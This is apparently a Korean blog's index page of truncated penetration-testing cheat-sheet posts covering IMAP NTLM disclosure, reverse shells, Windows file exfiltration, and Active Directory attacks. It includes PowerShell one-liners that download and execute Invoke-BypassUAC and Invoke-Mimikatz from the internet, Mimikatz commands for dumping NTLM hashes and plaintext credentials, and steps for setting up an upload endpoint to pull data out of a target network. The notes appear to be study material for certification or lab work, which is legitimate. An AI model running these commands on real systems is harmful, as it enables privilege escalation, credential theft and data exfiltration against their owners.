전체 글

카테고리 없음

143, 993 - IMAP

배너 그래빙 (Banner Grabbing)텔넷(Telnet)telnet 10.0.0.3 143 넷캣(Netcat)nc -n 10.0.0.3 143 Openssl (IMAPS 접속 시)openssl s_client -connect 10.0.0.3:993 NTLM 정보 노출 취약점 (NTLM Information Disclosure)수동 테스트:telnet example.com 143...>> a1 AUTHENTICATE NTLM+>> TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=+ TlRMTVNTUAACAAAACgAKADgAAAAFgooCBqqVKFrKPCMAAAAAAAAAAEgASABCAAAABgOAJQAAAA9JAEkAUwAwADEAAgAKAEkASQBTADAAMQA..

카테고리 없음

Reverse Shell/Bind Shell

쉘 생성기 : https://www.revshells.com/ Online - Reverse Shell GeneratorOnline Reverse Shell generator with Local Storage functionality, URI & Base64 Encoding, MSFVenom Generator, and Raw Mode. Great for CTFs.www.revshells.com 대화형 셸 풀업 (Upgrading Non-Interactive Shell)python -c 'import pty; pty.spawn("/bin/bash");'[Ctrl + Z]stty raw -echo; fg Msfvenom(Metasploit Framework중 하나) 활용Windows 10 x64 리버스 셸 ..

카테고리 없음

Windows 파일 업로드

윈도우 스크립트 언어로 파일 업로드 (데이터 유출)타겟 네트워크에서 윈도우 클라이언트를 통해 데이터 외부에 빼내야 할 때가 있음. 아웃바운드 HTTP 통신 열려있으면 칼리 Web Root(/var/www/html) 디렉토리에 아래 PHP 스크립트 만들어서 upload.php로 저장해두면 됨. 그 다음 uploads 폴더 새로 생성하고 www-data 유저가 파일 쓸 수 있게 소유권이랑 쓰기 권한 넘겨줘야 함kali@kali:/var/www$ sudo mkdir /var/www/uploadskali@kali:/var/www$ ps -ef | grep apachekali@kali:/var/www$ sudo chown www-data: /var/www/uploadskali@kali:/var/www$ ls -l..

카테고리 없음

Winodws 파일 전송

스크립팅 언어를 활용한 윈도우 파일 다운로드VBScript로 HTTP 다운로더 스크립트 만들기:echo strUrl = WScript.Arguments.Item(0) > wget.vbsecho StrFile = WScript.Arguments.Item(1) >> wget.vbsecho Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbsecho Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbsecho Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbsecho Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbsecho Dim..

카테고리 없음

AD Lateral Movement

Powershell One-Liners# Invoke-BypassUAC를 호출하고 PowerShell 프롬프트를 관리자 권한으로 시작powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"# Invoke-Mimikatz: 메모리에서 자격 증명 덤프powershell.exe -exec bypass -C "IEX (New-Object Net..

카테고리 없음

AD Authentication

NTLM 해시 및 평문 자격증명 덤프NTLM 인증의 경우 Challenge-Response모델을 씀. 사용자 NTLM 해시로 암호화된 챌린지를 도메인 컨트롤러(DC)가 검증하는 방식. Mimikatz로 LM/NTLM 해시 추출하기전체 Mimikatz 가이드 로컬 관리자 권한 필요함# 보안 토큰을 SYSTEM 권한으로 승격mimikatz > privilege::debugmimikatz > token::elevate# NTLM 해시 및 평문 자격증명 덤프mimikatz.exe lsadump::secrets "vault::cred /patch" lsadump::sammimikatz > lsadump::secretsmimikatz > vault::cred /patchmimikatz > lsadump::sam ..

카테고리 없음

AD Automatic Enumeration

샤프하운드샤프하운드 수집기는 두 종류가 있음:SharpHound.ps1: 샤프하운드 실행용 파워셸 스크립트. 최신 버전부턴 파워셸 스크립트 형태로는 안 나옴. RAT랑 쓸 때 좋음. 스크립트 바로 메모리에 띄울 수 있어서 디스크 백신 검사를 피할 수 있음SharpHound.exe: 윈도우 실행파일 버전. 둘 다 여기 있음: https://github.com/BloodHoundAD/SharpHound/releasesAll이랑 Session 수집 옵션 주고 샤프하운드 돌리는 법: cmd> Sharphound.exe --CollectionMethods All --Domain asd.domain.com --ExcludeDCs 다 돌고 나면 실행했던 폴더에 시간 박힌 ZIP 파일이 생성됨 블러드하운드칼리 리눅스..

카테고리 없음

AD Manual Enumeration

유저 / 그룹 / 컴퓨터 (Users / Groups / Computers)Domain Admins나 파생된 Local Admins 같은 도메인 내 고권한 유저 훑어보기. 커스텀 그룹도 같이 찾아봄.# 도메인 내 전체 유저 리스트 뽑기cmd> net user /domainPS > Get-NetUser | select cn # PowerView.ps1 사용# 특정 유저 상세 정보 보기 cmd> net user [username] /domain # 소속 그룹이 10개 넘어가면 cmd 명령어는 에러남PS > Get-ADUser -Identity -Server asd.domain.com -Properties * # 파워쉘# 도메인 내 전체 그룹 리스트 뽑기cmd> net group /domainPS > Get..

잉여토끼
IQ Spoofing